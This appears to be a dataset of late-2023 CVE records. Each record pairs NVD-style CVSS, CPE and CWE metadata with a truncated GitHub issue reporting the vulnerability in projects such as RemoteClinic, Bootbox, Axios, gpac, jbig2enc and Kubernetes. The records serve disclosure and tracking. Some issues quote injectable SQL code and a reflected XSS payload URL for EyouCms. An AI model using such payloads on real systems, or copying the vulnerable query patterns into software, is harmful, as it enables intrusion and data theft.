{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/RedisGraph/RedisGraph/issues/3178" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redislabs:redisgraph:*:*:*:*:*:*:*:*", "matchCriteriaId": "AF83E4D7-A176-4767-A2C4-31B52259CBAB", "versionEndExcluding": "2.12.9", "versionEndIncluding": null, "versionStartE...
[ "787" ]
787
https://github.com/RedisGraph/RedisGraph/issues/3178
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "RedisGraph", "RedisGraph" ]
# Summary I have found a security vulnerability in the latest codebase of RedisGraph. With personal investigation, I think an attacker could leverage this vulnerability to archive a **remote code execution** on a vulnerable Redis instance. The vulnerability exists in code logic after a valid authentication. # PoC...
OOB-write vulnerability lead to REMOTE CODE EXECUTION
https://api.github.com/repos/RedisGraph/RedisGraph/issues/3178/comments
4
2023-09-07T03:11:33Z
2023-11-07T13:09:02Z
https://github.com/RedisGraph/RedisGraph/issues/3178
1,885,041,045
3,178
5,728
CVE-2023-46998
2023-11-07T05:15:13.657
Cross Site Scripting vulnerability in BootBox Bootbox.js v.3.2 through 6.0 allows a remote attacker to execute arbitrary code via a crafted payload to alert(), confirm(), prompt() functions.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/bootboxjs/bootbox/issues/661" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/soy-oreocato/CVE-2023-46998/" }, { "s...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bootboxjs:bootbox:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "78B59235-F11D-45F3-BC6F-15B49C64CCC1", "versionEndExcluding": null, "versionEndIncluding": "6.0.0", "versionStar...
[ "79" ]
79
https://github.com/bootboxjs/bootbox/issues/661
[ "Issue Tracking" ]
github.com
[ "bootboxjs", "bootbox" ]
bootbox.confirm and alert use jquery's .html() (and other functions) that add content to html elements. These are a potential XSS security issue since jquery evaluates the content. Here's a working example (scroll down to the bottom of the JS window for the example code, I just borrowed somebody's fiddle and modi...
Document or fix possible XSS vulnerability (via jquery)
https://api.github.com/repos/bootboxjs/bootbox/issues/661/comments
48
2018-05-24T01:16:44Z
2025-03-28T02:13:21Z
https://github.com/bootboxjs/bootbox/issues/661
325,930,215
661
5,729
CVE-2023-33478
2023-11-07T15:15:10.630
RemoteClinic 2.0 has a SQL injection vulnerability in the ID parameter of /medicines/stocks.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vend...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
[ "89" ]
89
https://github.com/remoteclinic/RemoteClinic/issues/22
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
### Vulnerable code: [Line 51 in stocks.php](https://github.com/remoteclinic/RemoteClinic/blob/master/medicines/stocks.php#L51) ```php $sql=mysqli_query($con, "select * from p_stock where branch='$id' order by code asc limit 20000")or die(mysqli_error()); ``` User data flows into this manually-constructed SQ...
SQL injection vulnerability in `id` parameter of `/medicines/stocks.php`
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/22/comments
1
2023-05-05T12:17:42Z
2023-11-09T15:25:43Z
https://github.com/remoteclinic/RemoteClinic/issues/22
1,697,523,258
22
5,730
CVE-2023-33479
2023-11-07T15:15:10.690
RemoteClinic version 2.0 contains a SQL injection vulnerability in the /staff/edit.php file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/23" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vend...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
[ "89" ]
89
https://github.com/remoteclinic/RemoteClinic/issues/23
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
### Vulnerable code: [Line 62 in staff/edit.php](https://github.com/remoteclinic/RemoteClinic/blob/master/staff/edit.php#L62) ```php $profile=mysqli_fetch_object(mysqli_query($con, "select * from p_staff_dir where id='$id'")) ``` User data flows into this manually-constructed SQL string, leading to SQL injection...
SQL injection vulnerability in `id` parameter of `/staff/edit.php`
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/23/comments
1
2023-05-05T12:49:47Z
2023-11-09T15:24:25Z
https://github.com/remoteclinic/RemoteClinic/issues/23
1,697,567,092
23
5,731
CVE-2023-33480
2023-11-07T15:15:10.743
RemoteClinic 2.0 contains a critical vulnerability chain that can be exploited by a remote attacker with low-privileged user credentials to create admin users, escalate privileges, and execute arbitrary code on the target system via a PHP shell. The vulnerabilities are caused by a lack of input validation and access co...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/24" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vend...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
[ "434" ]
434
https://github.com/remoteclinic/RemoteClinic/issues/24
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
## Vulnerability chain in RemoteClinic application ### Vulnerability description The RemoteClinic application contains a critical vulnerability chain that can be exploited by a remote attacker with low-privileged user credentials to create admin users, escalate privileges, and execute arbitrary code on the target s...
Privilege escalation and arbitrary file upload vulnerability leading to Remote Code Execution
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/24/comments
1
2023-05-06T03:16:43Z
2023-11-09T15:20:47Z
https://github.com/remoteclinic/RemoteClinic/issues/24
1,698,401,625
24
5,732
CVE-2023-33481
2023-11-07T15:15:10.793
RemoteClinic 2.0 is vulnerable to a time-based blind SQL injection attack in the 'start' GET parameter of patients/index.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/25" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vend...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
[ "89" ]
89
https://github.com/remoteclinic/RemoteClinic/issues/25
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
## Description The web application is vulnerable to a time-based blind SQL injection attack in the 'start' GET parameter of `patients/index.php`. An attacker can inject malicious SQL statements into the application, causing it to respond with a time-delayed response that indicates the vulnerability. Exploiting this ...
SQL injection vulnerability in the 'start' GET parameter of `patients/index.php`
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/25/comments
1
2023-05-06T03:48:39Z
2023-11-09T15:21:52Z
https://github.com/remoteclinic/RemoteClinic/issues/25
1,698,412,619
25
5,733
CVE-2023-46001
2023-11-07T22:15:11.473
Buffer Overflow vulnerability in gpac MP4Box v.2.3-DEV-rev573-g201320819-master allows a local attacker to cause a denial of service via the gpac/src/isomedia/isom_read.c:2807:51 function in gf_isom_get_user_data.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/e79b0cf7e72404750630bc01340e999f3940dbc4" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/gpac/gpac/i...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev573-g201320819-master:*:*:*:*:*:*:*", "matchCriteriaId": "63154633-0211-47E2-861B-3FB9BE27BA70", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "120" ]
120
https://github.com/gpac/gpac/issues/2629
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "gpac", "gpac" ]
# Version ``` root@4dd48d09e778:~/gpac/bin/gcc# ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev573-g201320819-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC:...
SEGV in gpac/src/isomedia/isom_read.c:2807:51 in gf_isom_get_user_data
https://api.github.com/repos/gpac/gpac/issues/2629/comments
0
2023-10-10T04:03:18Z
2023-10-11T10:57:17Z
https://github.com/gpac/gpac/issues/2629
1,934,290,908
2,629
5,734
CVE-2023-45857
2023-11-08T21:15:08.550
An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axios/axios/issues/6006" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" }, { "source": "af854a3a-2127-...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axios:axios:1.5.1:*:*:*:*:node.js:*:*", "matchCriteriaId": "28179B3F-4DC0-416C-BC68-2678D3DF2313", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "352" ]
352
https://github.com/axios/axios/issues/6006
[ "Exploit", "Issue Tracking" ]
github.com
[ "axios", "axios" ]
### Describe the bug Hi team, @jasonsaayman and @DigitalBrainJS, The library inserts the X-XSRF-TOKEN header using the secret XSRF-TOKEN cookie value in **all requests to any server** when the XSRF-TOKEN cookie is available, and the withCredentials setting is turned on. If a malicious user manages to obtain this ...
CVE-2023-45857 (CWE-359) XSRF-TOKEN value is disclosed to an unauthorised actor
https://api.github.com/repos/axios/axios/issues/6006/comments
40
2023-10-16T20:36:35Z
2024-04-19T20:29:13Z
https://github.com/axios/axios/issues/6006
1,946,049,542
6,006
5,735
CVE-2023-46362
2023-11-08T21:15:08.633
jbig2enc v0.28 was discovered to contain a heap-use-after-free via jbig2enc_auto_threshold_using_hash in src/jbig2enc.cc.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/agl/jbig2enc" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/agl/jbig2enc/issues/84" }, { "source...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jbig2enc_project:jbig2enc:0.28:*:*:*:*:*:*:*", "matchCriteriaId": "5BB6C453-2F4A-4ED7-B529-879B4527FBE3", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
[ "416" ]
416
https://github.com/agl/jbig2enc/issues/84
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "agl", "jbig2enc" ]
# heap-use-after-free in jbig2enc ### Description jbig2enc v0.28 was discovered to contain a heap-use-after-free via jbig2enc_auto_threshold_using_hash in src/jbig2enc.cc. This vulnerability can lead to a Denial of Service (DoS). ### ASAN Log ./src/jbig2 -s -a -p Poc1jbig2enc ```shell ==================...
heap-use-after-free in jbig2enc via jbig2enc_auto_threshold_using_hash in src/jbig2enc.cc.
https://api.github.com/repos/agl/jbig2enc/issues/84/comments
2
2023-10-16T17:25:59Z
2024-12-19T17:54:29Z
https://github.com/agl/jbig2enc/issues/84
1,945,735,940
84
5,736
CVE-2023-46363
2023-11-08T21:15:08.673
jbig2enc v0.28 was discovered to contain a SEGV via jbig2_add_page in src/jbig2enc.cc:512.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/agl/jbig2enc" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/agl/jbig2enc/issues/85" }, { "source...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jbig2enc_project:jbig2enc:0.28:*:*:*:*:*:*:*", "matchCriteriaId": "5BB6C453-2F4A-4ED7-B529-879B4527FBE3", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
[ "120" ]
120
https://github.com/agl/jbig2enc/issues/85
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "agl", "jbig2enc" ]
# SEGV in jbig2enc ### Description jbig2enc v0.28 was discovered to contain a SEGV via jbig2_add_page in src/jbig2enc.cc:512. This vulnerability can lead to a Denial of Service (DoS). ### ASAN Log ./src/jbig2 -s -S -p -v -d -2 -O out.png Poc2jbig2enc ```shell AddressSanitizer:DEADLYSIGNAL ============...
SEGV in jbig2enc
https://api.github.com/repos/agl/jbig2enc/issues/85/comments
2
2023-10-16T17:34:18Z
2024-12-19T18:03:12Z
https://github.com/agl/jbig2enc/issues/85
1,945,750,410
85
5,737
CVE-2023-4218
2023-11-09T09:15:08.320
In Eclipse IDE versions < 2023-09 (4.29) some files with xml content are parsed vulnerable against all sorts of XXE attacks. The user just needs to open any evil project or update an open project with a vulnerable file (for example for review a foreign repository or patch).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "emo@eclipse.org", "tags": [ "Patch" ], "url": "https://github.com/eclipse-cdt/cdt/commit/c7169b3186d2fef20f97467c3e2ad78e2943ed1b" }, { "source": "emo@eclipse.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ecl...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eclipse:eclipse_ide:*:*:*:*:*:*:*:*", "matchCriteriaId": "9B8336F1-FA6C-46B0-B4D2-F5B01D3F64DD", "versionEndExcluding": "4.29", "versionEndIncluding": null, "versionStartExcl...
[ "611" ]
611
https://github.com/eclipse-emf/org.eclipse.emf/issues/10
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "eclipse-emf", "org.eclipse.emf" ]
Please provide an XML load option for whether or not to resolve external entities. And please disable external loading by default. It would be ok, to have a fixed set of external files precached locally like in org.eclipse.help.internal.entityresolver.LocalEntityResolver / /org.eclipse.help/dtds/internal
do not to resolve external entities
https://api.github.com/repos/eclipse-emf/org.eclipse.emf/issues/10/comments
0
2023-07-31T16:07:39Z
2023-08-01T12:52:20Z
https://github.com/eclipse-emf/org.eclipse.emf/issues/10
1,829,582,952
10
5,738
CVE-2023-46894
2023-11-09T16:15:34.887
An issue discovered in esptool 4.6.2 allows attackers to view sensitive information via weak cryptographic algorithm.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/espressif/esptool/issues/926" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/espressif/esptool/issues/926" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:espressif:esptool:4.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "54405C4F-579C-43E5-B50E-AE8F473C7D49", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "326" ]
326
https://github.com/espressif/esptool/issues/926
[ "Exploit" ]
github.com
[ "espressif", "esptool" ]
### Operating System ALL ### Esptool Version 4.6.2 ### Python Version python3.x ### Full Esptool Command Line that Was Run None ### Esptool Output ```shell Description: I have identified a security vulnerability in the esptool project's use of AES ECB (Electronic Codebook) mode for initiali...
Cryptographic API Misuse Vulnerability: AES ECB used for initialization (ESPTOOL-756)
https://api.github.com/repos/espressif/esptool/issues/926/comments
1
2023-10-23T14:32:24Z
2023-10-27T02:27:48Z
https://github.com/espressif/esptool/issues/926
1,957,318,275
926
5,739
CVE-2023-47390
2023-11-11T18:15:14.683
Headscale through 0.22.3 writes bearer tokens to info-level logs.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/juanfont/headscale/issues/1259" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Thir...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:juanfont:headscale:*:*:*:*:*:*:*:*", "matchCriteriaId": "42E94F72-9B5D-4380-A9C4-940FF6726DC5", "versionEndExcluding": null, "versionEndIncluding": "0.22.3", "versionStartExc...
[ "532" ]
532
https://github.com/juanfont/headscale/issues/1259
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "juanfont", "headscale" ]
<!-- Headscale is a multinational community across the globe. Our common language is English. Please consider raising the bug report in this language. --> **Bug description** Looking at the headscale logs, it logs this at info level when accessing the HTTP api: ``` 2023-03-11T21:13:56Z INF unary dur=0.815623 md...
Headscale logs bearer tokens
https://api.github.com/repos/juanfont/headscale/issues/1259/comments
13
2023-03-11T21:18:28Z
2024-02-29T15:52:31Z
https://github.com/juanfont/headscale/issues/1259
1,620,148,580
1,259
5,740
CVE-2023-47346
2023-11-13T22:15:07.740
Buffer Overflow vulnerability in free5gc 3.3.0, UPF 1.2.0, and SMF 1.2.0 allows attackers to cause a denial of service via crafted PFCP messages.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/free5gc/free5gc/issues/482" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/free5gc/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:free5gc:free5gc:3.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "89BA8BA8-E366-48F9-930A-91ED1442AAFE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "120" ]
120
https://github.com/free5gc/free5gc/issues/482
[ "Exploit", "Issue Tracking" ]
github.com
[ "free5gc", "free5gc" ]
## Describe the bug While testing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when it receives special kind of PFCP messages (the secondary IE type is larger than 0x7fff). This could cause DOS of any UPF instance, all memory issues due to this kind of PFCP messages are ca...
[Bugs] UPF crash caused by PFCP messages whose 2rd IE type larger than 0x7fff
https://api.github.com/repos/free5gc/free5gc/issues/482/comments
3
2023-09-22T02:57:53Z
2023-11-02T04:51:21Z
https://github.com/free5gc/free5gc/issues/482
1,908,102,486
482
5,741
CVE-2023-47384
2023-11-14T20:15:08.417
MP4Box GPAC v2.3-DEV-rev617-g671976fcc-master was discovered to contain a memory leak in the function gf_isom_add_chapter at /isomedia/isom_write.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted MP4 file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2672" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https:...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev617-g671976fcc-master:*:*:*:*:*:*:*", "matchCriteriaId": "F540C691-D615-4A9B-8DD6-69B8488E3BA1", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "401" ]
401
https://github.com/gpac/gpac/issues/2672
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
1、Version ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev617-g671976fcc-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Config...
Memory Leak in gf_isom_add_chapter isomedia/isom_write.c:3182
https://api.github.com/repos/gpac/gpac/issues/2672/comments
0
2023-11-01T09:16:33Z
2023-12-04T10:07:48Z
https://github.com/gpac/gpac/issues/2672
1,971,994,862
2,672
5,742
CVE-2023-5528
2023-11-14T21:15:14.123
A security issue was discovered in Kubernetes where a user that can create pods and persistent volumes on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they are using an in-tree storage plugin for Windows nodes.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/kubernetes/kubernetes/issues/121879" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List" ], "url": "https://groups.google.com/g/kubernetes-security-anno...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "25FFBC6E-DCE9-4596-8ABE-AC6B6564AA40", "versionEndExcluding": "1.25.16", "versionEndIncluding": null, "versionStar...
[ "20" ]
20
https://github.com/kubernetes/kubernetes/issues/121879
[ "Issue Tracking", "Patch" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) - **HIGH** (7.2) A security issue was discovered in Kubernetes where a user that can create pods and persistent volumes on Windows nodes may be able to escalate to admin...
CVE-2023-5528: Insufficient input sanitization in in-tree storage plugin leads to privilege escalation on Windows nodes
https://api.github.com/repos/kubernetes/kubernetes/issues/121879/comments
1
2023-11-14T15:54:16Z
2023-11-16T13:42:24Z
https://github.com/kubernetes/kubernetes/issues/121879
1,993,034,362
121,879
5,743
CVE-2023-41597
2023-11-15T06:15:27.893
EyouCms v1.6.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /admin/twitter.php?active_t.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/emlog/emlog/issues/238" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "5B87F220-D05C-4885-8C0E-E5BD8D8DFB66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "79" ]
79
https://github.com/emlog/emlog/issues/238
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "emlog", "emlog" ]
EyouCms v1.6.2 存在反射型XSS漏洞,系twitter.php文件中active_t参数过滤不严。 ![image](https://github.com/emlog/emlog/assets/66168888/8e41f4b6-11a5-4f38-8646-8b56be13c0cd) 攻击者构造恶意链接: /admin/twitter.php?active_t=%22%3E%3Cscript%3Ealert(1)%3C/script%3E 登陆后的用户触发xss。 ![image](https://github.com/emlog/emlog/assets/66168888/e1cd5c6a...
EyouCms v1.6.2 存在反射型XSS漏洞
https://api.github.com/repos/emlog/emlog/issues/238/comments
2
2023-07-23T08:55:00Z
2023-11-16T08:47:03Z
https://github.com/emlog/emlog/issues/238
1,817,047,912
238
5,744
CVE-2023-48087
2023-11-15T15:15:07.453
xxl-job-admin 2.4.0 is vulnerable to Insecure Permissions via /xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailCat.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/xuxueli/xxl-job/issues/3330" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/xuxueli...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "122ECDB6-272C-4B31-907E-E9FFB36305EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "732" ]
732
https://github.com/xuxueli/xxl-job/issues/3330
[ "Exploit", "Issue Tracking" ]
github.com
[ "xuxueli", "xxl-job" ]
### Environment MySQL 5.7.44, XXL-Job-Admin 2.4.0 Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin) Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor) ### Vulnerability Information It was found that the direct query of xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailPage does not validat...
